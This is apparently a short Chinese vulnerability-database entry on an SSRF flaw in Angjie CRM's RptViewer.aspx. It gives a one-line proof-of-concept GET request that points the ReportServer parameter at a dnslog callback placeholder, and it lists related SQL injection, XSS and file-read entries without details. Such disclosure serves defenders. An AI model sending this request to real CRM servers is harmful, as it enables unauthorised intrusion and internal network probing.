昂捷CRM RptViewer.aspx存在SSRF漏洞

漏洞描述

PoC代码

GET /WebForms/RptViewer.aspx?ReportServer=http://{{dnslog}}

相关漏洞推荐

• 无POC昂捷-CRM-CWSOffice.asmx SQL注入
• 无POC昂捷CRM RptHelperSave接口存在XSS漏洞
• 无POC昂捷CRM cwsuploadpicture.asmx 文件读取漏洞